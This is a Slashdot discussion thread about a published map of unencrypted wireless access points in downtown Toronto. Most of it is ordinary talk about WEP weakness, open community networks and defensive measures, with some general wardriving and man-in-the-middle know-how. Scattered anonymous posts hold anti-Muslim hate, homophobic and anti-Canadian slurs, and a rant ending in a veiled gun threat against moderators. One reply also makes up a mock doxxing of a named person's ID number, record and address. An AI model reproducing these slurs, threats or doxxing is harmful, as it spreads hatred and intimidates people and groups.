There's a Second Cup just a bit West of there on Adelaide, and if you go East there's a Tim Hortons and some no name coffee shop on the North Side across from First Canadian, and two Timothy's (one in down at the PATH level, and one on the 1st floor) in First Canadian. I usually partake of Timothy's in First Canadian, though my real favourite is definitely Second Cup.

Re:Wireless nodes..

[SatoriGFX]

Starbucks? Yuck. The only thing they know how to do is over-roast their beans. All of their coffee tastes almost the same (just stronger or weaker but you can't taste the subtleties because they are simply roasted too much). Timothy's is the best of the coffee chains (I buy their beans too sometimes - pretty good, tops of the coffee chains again). At Timothy's there is a distinct and noticable differences in taste and strength of their many blends. I know. I have tried them ALL (yes, I am definitely a coffee freak). If you want to buy really good beans in Toronto try "The Coffee Tree" on Bloor. They roast all of their beans on site (and will even do a custom roast for you at no extra charge). They aren't cheap though. SatoriGFX.

Toronto

You see Michael, the problem with this story - like so many stories on slashdot - is that NOBODY CARES about this pointless bullsh*t.

IpEverywhere

[bond485]

Um, I wish I had thought of that. Damn. Gotta go mark my territory now..

Re:IpEverywhere

Prior Art citation:
I have two white T-shirts given out by Cisco at an IETF meeting (and other events) in 1999 which says "IP Everywhere" on the back under a graphic of Calvin of "Calvin & Hobbes" p-ing. On the front, it shows the Cisco logo and "Cisco 12000 Series Gigabit Switch Router".

Re:IpEverywhere

[BakaMark]

At my previous work, they had a project to roll out TCP/IP to replace an entire SNA network (consisting of over 1500 locations, within one country). The Project was originally called "IP Everywhere", but the Management changed the name of the project to something else when they found out that the techs had nicknamed the project "Yellow Puddle".

Let's hear it for the government!

[Phil+the+Canuck]

I can only assume that those red pins in and around Queen's Park are part of some government "Broadband for the Masses" program. Surely the government would never be lax on security.

For those who don't know, Queen's Park is the seat of the Ontario government.

Re:Let's hear it for the government!

[beaverfever]

Although Queen's Park has a few pins stuck in it, the rows of red to the left of it are all University of Toronto - Engineering school is on College Ave. just west of Queen's Park if memory erves me correctly... Lots of red down there... hehe, Let's hear it for the engineers!

Fuck you Hippie

You and your goat fucking, tofu eating clan suck ass

thank you!!!

link to the map (for lazy people like myself)

[mcguyver]

http://www.nakedwireless.ca/winudcol.htm

IpEverywhere?

[SlashdotTroll]

I don't mean for the following to be excepted as a troll...(pun intended)

My company specializes in low latency data chunks and loss-less throuput. Come by and see my company profile, IpooEverywhere. We are currently releasing positions, so don't ask for a work load.

Yay, more drive-by spam.

[EvilAlien]

All we need is more drive-by spam.

Thats right, the scum of the network are taking advantage of open wireless networks, whether they are chalked or grabbed off online maps such as net stumbler dot com. The rise of drive-by hacking is a natural by-product of the wardriving/chalking community, and it would be naive to considering this a surprising development. Highjacking an open wireless network is only the smart thing to do for hackers whether they are after data or just a spamming platform.

This puts the pressure on network administrators to secure their wireless networks. It is far easier to drive by a NAP and jack in, and the proliferation of wireless networks could obsolete physical intrusion techniques such as connecting a Dreamcast or iPAQ to an internal network. Tools for wardriving are readily available, such as THC-warDrive. A lazy or incompetant network administrator makes it easy for a kid with the parents car, a pringles can, and a laptop.

Re:Yay, more drive-by spam.

[Dread_ed]

Could you imagine...you and your wardriving buddies are out, ya know, wardriving...

You notice Fred, your closest bud and hackmeister supreme, is actin' a little weird and won't let you see his laptop screen. So you, being the larger of the two pasties and, as a result of the steriods in a clandestinely doped meal replacement bar you had that morning, pry it out of his hands...Only to find a STREAM of outgoing "Enlarge you penis NOW by working from home!" emails! ACK!!! Fred's a SPAMMER!!!

What would you DO?!?!?

"Sophocles...Euripides...Meet my cousin---Testacles."

Re:Yay, more drive-by spam.

[ntk]

Actually, the scum of the network aren't taking advantage of wireless networks. There are, as we speak, no reports of drive-by spamming in the wild. The article you reference claims to have such evidence, but it was a ZDNet journalist distorting what he heard from an expert. I know, I asked the expert.

I'm not saying drive-by spamming is not a theoretical possibility; I'd argue that there are a number of reasons why you won't see it in widespread use. Firstly, it's no harder to create a throwaway AOL account and spam from there. Secondly, one of the reasons why spamming is so prevalent is because it's entirely anonymous: sitting in front of someone's house hoping they don't spot you streaming through their network simply isn't. A lot of people really hate spammers; it's easy for spammers to laugh at their hatred from their own homes. It's a lot harder when they're sitting in a car, hoping you're not going to leap out with a baseball bat and explain a few things to them.

I understand your concerns about this hypothetical behaviour. But as someone who runs an open network, regularly uses other's open networks, and realises that security is more than just throwing up some foo around the LAN perimeter and hoping no-one gets through, I think it's a distraction from the real problems we have now.

*Yawn*

[PureFiction]

This is news? People have been
scanning wireless
networks
for a long time now...

I don't think so, Baffin

Eh?

A little to much Fromage in Toronto, eh?

HAHA, sucker!

Let me walk outside and, ahhhh, Vancouver.

We Live In Toronto!

T-O-R-O-N-T-O!

Humble and Fred, two married guys, that bum-fuck each other!

Uncle Vince, hello there girlfriend, da da da!

www.mojoradio.com

Ha ha canucks are so retarded

Fucking canadians, they suck so much cock!!!

Nothing good ever came from that frozen wasteland!!

Re:Ha ha canucks are so retarded

[SkankhodBeeblebrox]

Not to fall for the troll, but I assume he realizes the US share a fairly substantial border with Canada, and as such, share a fairly substantial amount of weather with Canada :P

Re:Ha ha canucks are so retarded

Isn't something like 17 US States wholly or partially further north than Windsor, Ontario? A mere 4 hours drive SW of Toronto. Right now I'd be happy to see some snow as I'm sick of this heat, humidity and smog.

Accuracy of map?

[beaverfever]

How accurate could/should a map like this be? Last time I was in Toronto the NW corner of Jarvis/Dundas (right side, middle of map) was a parking lot, but there are a few red flags there... does that make sense? Admittedly, the parking lot could have been built upon in the past few months, but I doubt it. Or someone could be running a network from their van. Or I just don't know enough about this sort of thing.

Jez curious is all...

Re:Accuracy of map?

[beaverfever]

Okay, maybe those pins are on the SW corner of Jarvis and Dundas, but that is a discount store selling cheap plastic crap or something like that... doesn't make sense. Still curious.

Re:Accuracy of map?

[MagicFab]

Red flags indicate signal detection, not signal origin...

Re:Accuracy of map?

[beaverfever]

ohhh, right... why didn't I think of that? I'll be going back to sleep now. Thanks :)

Re:Accuracy of map?

[great_flaming_foo]

If I remember my netstumbler 101 class correctly the pins are where they were when they spoted the network. So the AP is most likely in a near by building but they spoted it while sitting in the parking lot. The company I work for does wireless and I have seen netstubler logs that spoted our AP like twenty miles from its accutal location.

Re:Accuracy of map?

It's part of Lastman's new social platform, "802.11 For Scumbags and Crackheads."

Re:Accuracy of map?

Hey, moron.

At the corner of Jarvis and Dundas, you have following buildings in the IMMEDIATE vicinity:

1. Sears Canada Corporate HQ (gee, sounds like a potential candidate);

2. A shiny new Comfort Inn Suites Hotel;

3. The Grand Hotel (some tall, swanky place);

4. A whole slew of Ryerson Polytechnic University buildings;

5. The Merchandise Building (fancy lofts now, big tall windows, lots of $$$ tenants)

There's also an apartment building on the SW corner.

The parking lot you so mention is a very small part of that intersection...

Of course... maybe it's the Ho-Lee-Chow (chinese food chain) at the corner...

Maybe they should change the sign in the window from:

NO MSG

to

NO WAP

nyuk nyuk nyuk

You missed the other Naked Reference...

[RobinH]

Direct from Toronto: Naked News!!!

A quote

[JazerWonkie]

A quote taken from a CEO in fits of rage when he finds out that his company is on that list:

Fire the Net Admin, and call our lawers were going to see IpEverywhere in Court

Bang the Marketing Drum

[DaytonCIM]

This sounds like a consulting firm drumming up business for themselves. Kind of like the telemarketers that call everyday offering to sell us toner at a reduced rate.

Re:Bang the Marketing Drum

Uhm, wouldn't it make more sense for the telemarketers to FAX you every day offering toner at a reduced rate?

Re:Bang the Marketing Drum

[DaytonCIM]

Yes, it would make sense if they were selling Fax toner. They're not. They're selling printer toner.

Out

Life Savings....

[InOverMyFeet]

I'll see your $12.67 and raise you another $5.

...couldn't resist:)

the map fails....

[Lumpy]

What about properly secured public/community wireless portals that use nocatnet for user authentication? they dont use WEP as it's useless for this kind of community access point. while nocatauth does quite well at making open portals available for members.

Shut up mongoloid

You and your assfucking, cumguzzling friends suck ass!

An old story gets worse

[phorm]

In the old days... when somebody had an easily accessed jack to their phone system into which you could plug a phone (or modem, although laptops weren't as popular) and make long distance calls

Today, when people have a wireless "jack" to which large masses of people can plug in and make use of their connection/network/internet.

Seems to me that as technology progresses so do the ways to abuse it, and the stupid ways in which people leave themselves open to abuse...
General Public Ignorance keeps me employed - phorm

ALLAH IS A PIG'S CUNT

Death to Allah, the cruel, the false, the stupid. Destroy Islam. May justice prevail.

Unsecured networks at US Consulate?

[td]

There's a pair red pins (unsecured WAPs) on the west side of University Avenue between Dundas and Queen, right about where the US Consulate is.

Re:Unsecured networks at US Consulate?

Which is also close to the staple/business depot that sells laptops and wireless routers

Re:Unsecured networks at US Consulate?

And let's not forget the Canada Life tower...

United States Consulate - honeypot?

[Malc]

It looks like two of the pins are almost in the right spot for the US Consulate (although it might be the next building up the road). Honeypot or clueless government officials?

Re:United States Consulate - honeypot?

[Ctrl-Z]

Yeah, and there are several in the Eaton Centre...maybe at Compucentre?

Re:United States Consulate - honeypot?

[ergo98]

It could be in the office towers above the Eaton's Center. Alternately one of the retailers could be using wireless between cash registers and their hub (remember that Home Depot, I believe, was doing that for a while).

I'm actually surprized by how few there are on there: I would have expected First Canadian Place (Bay and Adelaide), and Scotiabank's tower across the street, to be circled by them, but instead there's nary a hint of wireless around them.

No map there either

I still get a puzzle piece prompting me to download a closed source plugin to see the map. Anyone running an insecure box care to take a screenshot and link to it?

Re:No map there either

Shut your pie-hole, you pompous prick.

Unencrypted != unsecured

[Leto2]

People, unencrypted by WEP doesn't mean unsecured. We all know 802.11 WEP has its shortcomings, so more and more administrators are relying on different techniques to secure their wireless LAN, IPsec and VPN to name a few.

And after you've secured your network on a higher level than OSI 1, you can be less paranoid about WEP. So much less, that some claim that DISabling WEP is not a bad thing at all. Think about it, you already have encryption taken care of, so why not make your network more stable, robust and fast by disabling WEP?

Those 'wardriving' pictures should make a distinction between "secured with WEP", "no WEP, but I cannot use the network because of IPsec/VPN/whatever" and "no WEP, and I can surf freely through it".

-Leto2

Re:Unencrypted != unsecured

[MagicFab]

At the very least, change the legend so it reads:
WEP Enabled (Worse, false sense of security) instead of:
WEP Enabled (Good)

Re:Unencrypted != unsecured

I make your network more fast! You hire! Stupid American not know how to encrypt network...

Re:Unencrypted != unsecured

[caluml]

I tried to set up a wireless lan that only saw the public interface of a VPN box, and it worked fine.
Then we had the need to hook iPaqs up to it, and it all fell down.
Sure there are VPN clients for iPaqs (Movian), but have you ever tried running 3DES on one? It does it, but the bandwidth drops right down to about 200-300kb/s.
Ho hum, back to WEP.

Mind you, our wireless network isn't used much at all, and so I doubt anyone could have collected enough interesting packets, even if they had been running AirSnort from the word go.
My advice? Run Airsnort, and each time it breaks your key, change the key, and let people know.

the image....

[_ph1ux_]

...in my head was of naked warwalkers. but, isnt it cold in toronto? just think of the shrinkage.

Re:the image....

I wish...the temperature in Toronto at the moment is 34C (for those of you who are SI-challenged, that's 93F).

Re:the image....

[Ctrl-Z]

According to weather.com, the current temperature in Toronto is 84F, or about 29C. I don't think that's cold enough for significant shrinkage.

Re:the image....

[machine+of+god]

Yeah, on the guys, but think of the girls!

(Sorry girls) Are there even any girls who read this site? More importantly, will they marry me?

Re:Terror Alert and The Posse Comitatus Act of 187

[perfessor+multigeek]

You know, it's a real shame that you posted this here because I've actually found this post quite useful. Right info, very wrong place. Trust me, as both a manager, and a long time political activist, the tone and time do count. Otherwise you just become yet another strident Operation Rescue-type wacko discrediting the very concern that you sought to promulgate,
Too bad you didn't have the self control to find a better discussion. Couldn't you at least have posted this as part of a YRO discussion?
Sadly agreeing with the general judgement of TROLL!!,
Rustin

You don't need a map

[wytcld]

As the map shows, about anywhere you go in Toronto, there's open access. Since there is no crime in Canada, this is not a problem, it's a feature.

Uh-oh.

[Soko]

Queens Park (look on north portion of the map) is the seat of the Ontario Provincial Legislature, not an open, green space. This means that there are (or were) 2 open, non WEP (like that mattered) access points within the government offices. I really, really hope these are isolated from the internal network via firewalls - I don't want all of the info that the Ontario Government has on it's citizens (like me and my family) being broadcast for anyone to see/save/use.

Soko

Re:Uh-oh.

[p3d0]

Actually, it's both. There is a small (5-minute-walk diameter) park north of the government buildings. Of the Queen's Park oval, probably 40% of it is buildings. (It's the gray part of the map.)

Re:Uh-oh.

[Greedo]

I don't want all of the info that the Ontario Government has on it's citizens (like me and my family) being broadcast for anyone to see/save/use.

Don't worry Scott Kormick (SIN: 574-782-401). All of your personal information -- such as your annual salary of $45,490 as Assistant Manager of a Subway franchise, your 12 unpaid parking tickets, and your criminal record (shame on you for drinking in High Park) -- is secure within the governement's system.

In order to assure you, I stopped by your house at 312 College St. to let you know in person. I guess you were at the hospital having that nasty rash looked at (I hear it's hereditary).

Oh, and your cat Snickers is cute.

I work in IT...

[wo1verin3]

With IT people in the Toronto area... here is how serious they took this map.... Several of them wanted to know if we could find the blinking red dot over their house. :(

Re:I work in IT...

[CokeBear]

The first thing I did was check to see the one that I administer (at the corner of Bay & Elm Streets). I work in a little Mac Store here, and one of the services we provide to our customers (and everyone else) is free wireless access. I should probably WEP my network, and at least have them ask for the password to log in... but I'm just too lazy. We're open 'till midnight on weekdays, so I might get around to it tonight. If you're in the area, drop by and ask for Daniel... If you tell me you saw my posting on /. um... I'll give you a free Ambrosia SW CD. Otherwise... free AirPort access until I secure it.

Cheers

Re:I work in IT...

thats kewl Daniel! cheers m8! :D

While Bush Fucks America, Canada Just Looks Better

Tired of Bush?

Fuck it. Move to Canada. A real, civilised, modern nation. Who would have thought?

Excellent healthcare FOR EVERYONE, excellent schools, the most pristine nature in North America. Cool cities, great people.

Why get shot in the 'hood when you got Canada in yo hood?

Canada loves you, and we love Canada.

And really, there is no place like B. C. It Owns!

Arg, they keep making that mistake!!

[ch-chuck]

while black triangles indicate networks protected with WEP -- "wireless equivalent privacy" -- encryption.

I know it's a wireless technology, but WEP is (in theory at least) wired equivalent privacy - that is, it's supposed to be about as good and private as cat5, arrrrrg!

I'll Give Admins Some Ideas Too Then. :)

[The+Turd+Report]

1. Block outbound/inbound port 25 traffic, except to/from local MX. Or, block it totally, if possible.
2. Block common proxy ports.
3. Route all HTTP traffic thru a secured proxy.

That should cut off most of the routes that spammers use to spam. Any WLAN that does not take these steps will soon become a spammer magnet.

This is a problem everywhere!

[Newer+Guy]

This is a problem in just about every city. I live on a tree lined residential street in Santa Monica, CA. There's no real offices or businesses within about a half mile because I live between two public parks. I was planning on putting in a wireless network in my house so I bought a card and put it in my laptop. I was AMAZED to find that it locked right up to someone else's network immediately! I was able to browse the web, and even look at their shared files. This was true on channel after channel on the card. I can only imagine how it must be even worse in an industrial area. Now I know why my 2 Ghz spread spectrum phone has such poor range.

Reality Check

I like to give Americans a reality check by telling them that the southeast end of southern Ontario is farther south than northernmost California. They invariably don't believe it. Then I pull out a map and show them.

Re:Reality Check

[FigWig]

Doesn't really matter, Toronto weather sucks most of the year (too cold or too humid & hot). Just like New York and the rest of the region. I'll take the Northern California Bay Area weather anyday.

Re:Reality Check

[kcurrie]

..yes and when you tell them that Windsor, Ontario is SOUTH of Detroit, MI they don't believe that either! 'tis true.

Wireless in trouble?

[Anonym1ty]

With all this on war driving and hacking into networks for fun or foul, we better start being careful of what we say and how we act. (be nice)

We should realize that right now we have a great oppertunity to use wireless.

If admins continue to leave networks that need to be secure open to the public they are going to get hacked -in one form or another, maybe just harmlessly syphoning bandwidth, maybe stealing private information - but something is going to happen regardless.

What I fear hear is government regulation. Right now it is the resposibility of the admin who sets up this network to make sure it is reasonably secure. If wireless hacking becomes enough of a problem, governments will be compelled to regulate wireless networks. Sure some regulation may even be good, but from my perspective what is more likely to happen is it will be regulated to death.

Whenever we are forced to regulate we get these types of results: People who want to use wireless won't be able to comply with impossible for the little guy to comply with standards - experimentation dies, soon so does innovation.

Why should admins secure their network when they can rely on a government wireless police force to go around picking up the kiddies breaking into their network? Sounds stupid? that's right it sure is, but crap like this could very well happen. -We're allowed to remail lazy.

I have a wireless lan and it's reasonably secure... It isn't hack proof - nothing is. but it is encrypted and secured and stuff and also it is on it's own network, not directly tied into my wired lan... plus there isn't information on the wireless that could be considered "secret" or personal. I want the thing to work around the house for getting that there interweb. The access point is in the basement -- a simple thing, limits the coverage of the unit a lot - just the house and parts of the yard.

I'm still looking at other ways to secure it. I found a good one the other day SHUT IT OFF WHEN NOT IN USE. (who'd a thunk it?) Why can't businesses figure this one out?? put the power cord to the thing on a timer!! not business hours? no wireless!

Re:neat idea; needs work.

Read it out loud: "I Pee Everywhere". Weak pun, but better than nothing.

How can this be considered Off-Topic, it was explaining the pun for those that don't get it?

that's 90F plus

The weather today in Toronto is 34 celcius, that's 90F plus

93.2F, and that's before you factor in the humidity. The current "humidex" is 37C which is 98.6F. Thank god we all live in igloos - we just get naked and lean on the walls to cool off.

Re:While Bush Fucks America, Canada Just Looks Bet

[iplayfast]

And yesterday Ontario just had our 25 smog alert day of the year. Beating our all time record. :(

So much for our pristine nature.

Richmond and Spadina?

[checkyoulater]

I want to know who is using all those Wireless Networks all along Richmond near Spadina. I thought that was towards the end of the Club District.
Even along Queen West, for that matter. Last I checked Queen West was a bunch of trendy clothing stores and used cd shops. Of course, I can't forget about Active Surplus, the best damn store in Toronto.

Am I missing something here?

Re:Richmond and Spadina?

[SaturdayNight]

Actually, there are some pretty chic office spaces down there that are used by IT consulting firms. Offhand I can think of Cyberplex (may no longer be there) which is in the Paramount movie theatre building, and Toronto.com's offices. Chapters.ca as well...

Re:Richmond and Spadina?

[SnarkDogma]

Sure, lots of people, myself included live, in the area. I would guess that a good number of the WAPs they found are actually residential.

Re:Richmond and Spadina?

[_J_]

I live NW of Queen and University. I think I need to get a wireless networkign card....

IMHO, as per

J:)

Re:Richmond and Spadina?

[Mr+M]

Richmond and Spadina is a huge IT / .com area. No surprise at all that there are lots of nodes in that area. I would expect it.

Re:Richmond and Spadina?

[checkyoulater]

Residential. Of course! I forgot about all those old textile buildings that were turned into expensive lofts for cool yuppies. Wish I could afford one. Hell I wish I could afford a Wireless card for my notebook, then I could ride around there on my bicycle.

Re:Richmond and Spadina?

[AndroidCat]

It's not just residential. There were a lot dot.boomer companies that moved into that area. (But BigRedH is dead dead, ha!) Lovely wood floors.

Naked College

[mr.+phantastik]

Apparently my college (George Brown) has a naked network. I never thought in a million years I would be reading something like that on Slashdot.

I love it. Time to h4x0r my grades.

Re:Naked College

Or Alias Wavefront head office (and main dev site) - which is right next door.

U of T.

[Christopher+Thomas]

I notice one of the big red "abuse me" circles right in the middle of the U of Toronto engineering buildings, where they should know better.

I'd make snarky comments about the prof who I suspect might be running the open network, but in this case I have no strong reason to suspect it's him.

Re:U of T.

U of T has had an open network for over a year now. It was done as such for the benefit of the students. I don't know what the details are for access control, but with hundreds or thousands of wireless users, I doubt they even care much.

Re:U of T.

[Christopher+Thomas]

U of T has had an open network for over a year now. It was done as such for the benefit of the students. I don't know what the details are for access control, but with hundreds or thousands of wireless users, I doubt they even care much.

Ok, then it isn't the nameless prof.

It just disturbs me that, in addition to having basically insecure workstations with their arses hanging out on the 'net with little or no filtering, that we are doing the equivalent of giving anyone who walks by an ethernet cable and saying "here! don't bother attacking us remotely, we'll give you a direct link!".

To their credit, the administrators do a fine job of keeping the system up and running. I just find security around here a little worrisome.

Technological darwinism.

[MongooseCN]

I say abuse the ignorant and we can bring back darwinism in a technological point of view. Survival of the fittest.

Not necessarily a problem

[Arker]

Remember, WEP is not the be all and end all of wireless security. Just because those networks don't have WEP doesn't mean they aren't secured in another, quite possibly better, way.

Of course, they could also be totally open. No way to know without taking your laptop on a walk I suppose... let us know what you find out if you do.

Re:Not necessarily a problem

[Soko]

Ummmm...that was the point of my post. WEP is more or less just a padlock - it only really keeps out the curious. Someone looking for access won't have much trouble getting past that. In order to dead-bolt the access, the wireless access points should be on the untrusted side of a firewall, with VPN access for authorised machines.

I wish I _could_ find out if it's still wide open - I'm a ways away in Hamilton right now. And one does not just "go to Toronto" on a whim - the gridlock is viscious, so I'll rely on others to find out and post what they saw. :)

Soko

Come, spammers! To my unsecured tr^H^Hap!

[tunabomber]

Spamming from unsecured wireless networks will be a fun form of shameless profit until people start setting up "sting" nodes that will be specially rigged so that upon detecting that they are being used by a spammer, they will photograph their license plates, call the cops, and maybe spray some hot tar and feathers for good measure.

Re:Come, spammers! To my unsecured tr^H^Hap!

[AndroidCat]

Computer controlled stone gargoyles. 20+ story drop. Problem solved.

Should how awareness is achieved be important?

[Senior+Frac]

Is this going to help spread awareness, or is this just going to encourage people to abuse the (apparently) ignorant?

You act as if these are two mutually exclusive events. I do not believe them to be. Awareness is nice to be given in homeopathic doses, but I'm glad to see it spread given any opportunity.

I.P. Freely

[kirkb]

Wouldn't IpFreely have been even funnier?

Aluminum siding better than WEP

[elliotj]

I setup a WIFI net at home recently and have found that the coverage I get inside the house is amazing. Outside it's a different story. I'm pretty sure that the aluminum siding is blocking the signal from leaving the building because I do get limited reception if I'm lined up with a window.

Basically this stops any war drivers from seeing my network unless they get really lucky and creep up to the bushes outside one of the few windows that faces the street. If they do that I'm more at risk that they see ME naked than my network!

Anybody else notice specific physical obstacles that clobber reception?

Re:Aluminum siding better than WEP

[mekkab]

For this exact reason I have stopped the time honored practice of "checking the wifi atennae in the buff."

I haven't tried this yet, but I'll check what my outside reception is like. I'm still trying to figure out how to set things up inside. I get AWESOME reception two floors below in the "dungeon", but who wants to compute in the dungeon? (INSERT BDSM PRON JOKE HERE)

I'm not sure if the heating ducts running up and through the house are helping it or not...

And my "spot" at the dining room table gets BALLS. Its quite close to the open stairwell (at the top of which is the room with the WAP diagonally opposite the door) but the waves will not travel.*

* Actually, I haven't checked since I re-positioned the wap on top of a 100 blank cd-r tower and tried to tilt the antennae in the right direction.

Naked != unprotected or insecure

[mouthbeef]

I just spoke with the COO of the IPEverywhere about this study, and confirmed that the methodology only established whether a node was running WEP (a "security measure" of dubious value).

That means that many of the "unsecured" nodes in this report may have had other means of securing themselves, from switch- or AP-based MAC filtering to captive portals such as NoCat. Moreover, the protocol for this study did not establish whether the open APs in question were handing out DHCP leases (or, indeed, whether they were connected to the Internet at all).

Finally, this study did not investigate in any depth whether the open APs were deliberately or accidentally left open. Many of us run open "community" networks around the world (I operate one in Toronto at King and Niagara, and three in San Francisco, two at 19th and Shotwell, and one on Sycamore near 17th and Mission). These networks are deliberately "unsecured" and are provided out of public-spiritedness, or even out of a political commitment to providing tools for anonymous speech on the Internet -- anonymous speech being fundamental to democratic discourse.

Since WEP is such a poor "security" measure, the best practice for wireless users is to use SSH and/or SSL tunnels to secure sensitive traffic to a proxy (either remote or on your own network). In fact, if you're a promiscuous user of any network -- conference centers, airport lounges, hotel rooms, schools, etc -- you should assume that unless your messages are encrypted, they will be sniffed on the wire.

The primary "security" concern about open wireless seems to be that a "rogue" AP will be installed behind a firewall. The firewall, of course, is hardly sufficient in and of itself for securing a network. It's based on the presumption that everyone on one side of the firewall is trustworthy, and everyone on the other side is untrustworthy. We know, though, that this is a fallacy. Getting inside the firewall -- either through physical intrusion (think of visitors to your office plugging into the the network to check mail) or virtually, by 0wning a box on the network with a trojan -- is not difficult for a determined intruder. Meanwhile, the legitimate users of your network resources are often outside your firewall (mobile execs at a client site, for example) and thus not only walled off from the rest of the network, but also vulnerable to attack, since their machines' first line of defense is the firewall, which they are suddenly out of.

Security is hard. The proper place to draw your network perimiter isn't around your office, but around each machine. Personal firewalls, regular applications of security patches, good passwords and user education provide genuine security. Firewalls (and FUD about open APs) doesn't.

Re:Naked != unprotected or insecure

[PureFiction]

the best practice for wireless users is to use SSH and/or SSL tunnels to secure sensitive traffic to a proxy

This can be abused, however, if someone sets up a rogue access point with the same ESSID (perhaps even spoofing a good AP's MAC) and then executes various known and implemented man-in-the-middle attacks against SSH/SSL sessions.

In fact, many, many applications fail silently in the presence of a MITM attack. If you are lucky you will see a warning from SSH. If you are UNlucky, you will think you are secure while someone with a rogue AP captures all your traffic, and perhaps even hijacks a session.

You can do this with commodity amplifiers (to ensure that your AP signal is higher than all the legitimate AP's) and easy to come by antennas.

Re:Naked != unprotected or insecure

From what little I understand, MITM attacks are only doable with SSH1 protocol and not SSH2.

Can anyone provide more information on this?

Re:Naked != unprotected or insecure

MITM attacks can occur whenever any sort of key exchange occurs over an insecure network. Typically the public key is sent, swapped with a bogus one (provided by the attacker) and you'd just never know.

Your best bet is to compare fingerprints when you first log into a machine. You know that message PuTTY shows you when you first connect to a machine? You know, the one you always just click Yes to and not actually read. Next time, compare it to the actual key on the server.

$ ssh-keygen -l -f /etc/ssh/ssh_host_dsa_key.pub

Re:While Bush Fucks America, Canada Just Looks Bet

All time record --- despite the fact that the criteria get more and more strict, and back when smog was really bad (100+ years ago), there were no recorded statistics or "smog alerts".

Direct URL to the map

[ShieldWolf]

The actual URL is http://www.nakedwireless.ca/winudcol.htm

I work for a computer company at the corner of Bay and Dundas on the map, which has tons of red push pins. Luckily there are no nudist colonies here ;D

-Shieldwolf

The Naked City

[PizzaFace]

Darn, I thought this article was about Toronto's gift to journalism, Naked News.

There's a disclaimer !

[LePrince]

No one will abuse the map, there's a disclaimer that you have to accept before you see it that stipulates that you will not use it to abuse it. :-)

[/SARCASTIC MODE]

Same thing in Dallas

[tiedyejeremy]

The ONLY paper in Dallas publish the same type of info last week on the front page of thier technology section.

Re:While Bush Fucks America, Canada Just Looks Bet

[cprice]

Most people in the rest of Canada would probably argue that Toronto is not really a part of Canada anymore. The only thing making Toronto vaguely Canadian is the fact that they happen to be on the Canadian side of the border, and thats where the similarities end.

wow, lucky for microsoft

[AA0]

Its lucky for microsoft that their main office isn't in Toronto, otherwise people might find out something in microsoft isn't secure.

Re:wow, lucky for microsoft

Anyone know of a war driving map of Mississauga? MS Canada HQ is near Hwy 10 and Matheson Blvd W...

Hey!

[eaddict]

Did Ashcroft help design thier logo?

Re:Terror Alert and The Posse Comitatus Act of 187

Why don't you repost it to your heart's content? I don't have time to fucking dress up and prepare PR and press releases. You know as well as I that the lame ass editors here never post any USEFUL criticisms or editorials of "YRO" subject matter. I found this information disturbing and I tried to first post it to somewhere where it would get bandwidth. I like how being right about something is contextual. Not very promising, if my fellow fucking human beings place context above what's right an wrong.

Sadly, I am telling a fellow activist, fuck you and your troll rating, you fucking would be fascist. You don't censor things due to context. Like the radio dial, turn the station, tune out, but don't agree with the removal of what you find distasteful, because its subjective. One day the government might find YOU distasteful and contextually incorrect and you should be marker "DEAD," and promptly put into an oven and turned to ash.

No wonder the voices in my head are so loud!!

I work in the building on Bay/Gerard and there's a ton of devices in that location.

Seriously, I have a headache right now.

Insecure Linux distros? Already got 'em

Red Hat
Mandrake
Suse

They're about as secure as Windows.

A nice name

[IPFreely]

Toronto consulting firm IpEverywhere (pun intended)

I approve their choice of name.

It's Canada, who cares?

I mean seriously dude, it is Canada who really cares what goes on there. With their beady little eyes and their flappy heads. Damned canucks!

Re:Terror Alert and The Posse Comitatus Act of 187

This is just another example of spineless crap moderation here on /.

Mao Tse Tung, Hitler, Stalin, Castro, Pinochet, Mussolini, Marshall Joseph Tito, Slobodan Milosevic, Idi Amin, Ho Chi Minh, Saddam Hussein, Muammar Qaddafi, Juan Peron, Ayatollah Khomeini, Ferdinand Marcos, General Suharto, Pol Pot, Fransisco Franco, and certainly the worst of the bunch, SLASHDOT's editing/moderating [read: censoring] "community"(*) ALL AGREE on ONE THING:

CENSORSHIP WORKS!

(*)Note, the word community used often on Slashdot, this is referring to a proto communist commune.

So, you busy little plebian proletariats, get busy, you have some censoring to do! FUN! Do the bidding of your fat, undisciplined masters who never subject themselves to peer review!

Good job you little neo-commies. Don't want to hear the other side, shoot the fucker in the head as an ENEMY OF THE STATE [In this case anyone who seeks to improve the sad state of /.].

I have a Gun and the Constitution [Not the urinated-on pissed-on hacked fucked up one WashingTOON thinks exists, I mean the real one, with Jefferson and Madison at my side], please, give me an excuse to use them both.

A few haikus to commemorate the sucktitude:
Crack Pipe Moderators
Crack smoke wafts though air
Dumb shit moderator!
Try to suck less, please

The Humorless Moderator
Crack smoke wafts through air
Humorless moderator!
Why do you hate me?

The Proletariat
Slashdotting Commie
Moderator fears new idea!
Censor him quickly

The reason China blocked Slashdot is that when Jiang Xemin saw at how good "The Editors" at Slashdot are at suppressing the community, he knew that if more of his party members saw this degree of suppressive efficacy, he would be deposed, for the good of the people, of course, in favor of Rob Malda as the all new supreme dictator and premier of China.

It has been said that democracy is the worst form of government except all the others that have been tried. - Sir Winston Churchill (Especially when your democratic peers twist democracy into a reason commit censorship, to squash dissenting or unpopular opinions, and refer to them as trolls, flaimbait overrated or offtopic when they aren't any of the said)

The reason there are two senators for each state is so that one can be the designated driver. - Jay Leno.

The Constitution poses no threat to our current form of government. (Death to those who defile the root documents of a free nation to make economic freedom Supercede Freedom! Freedom First! Free market Second!)

Occam's Razor "Entities should not be multiplied unnecessarily." "Pluralitas non est ponenda sine neccesitate" "Frustra fit per plura quod potest fieri per pauciora" "Entia non sunt multiplicanda praeter necessitatem" Translation: " "Simple explanations are preferred to complex ones" Modern fucking translation "JUST DO IT."

Reading Slashdot at anything above -1 is like trying to put a shit filter on your ass.

Get busy moderating this down, you little pack of obedient prefects of the corrupt state! You are the vanguards of purity, and dissent is not allowed!

HAIKUS
MODERATORS Crack smoke wafts though air - Dumb shit moderator - Try to suck less, please
KAZAA Fuck R I A A - Network sold behind their backs - Stupid fucking cunts
Haiku: to the Slashfags. Fuck slash editors - The cumlicking fags they are - I shit upon them
TACO pondering GOATSE: I stare at the goat - His huge gaping ass so wide - And I want to eat
Haiku: The ancient haiku: - Flame Taco and CowboyNeal - With lame poetry.
CowboyNeal A mountain of fat, - butt cheeks jiggling like Jello. - What an odd poll choice!
CmdrTaco Watching Pokemon - With cum stuck on his goatee. - Newbie loser scum.
Stinky Kathleen Fent Cockeater Taco, - Proposing to Fent online, - I fingered her too.
Rob Malda and Kathleen FentChubby breasts, fat ass - Distract us from Rob's boylust. - But they both suck cock!
Taco Tuesday: Too much mexican. - Angry poo, firey hot. - Where's my antacid?
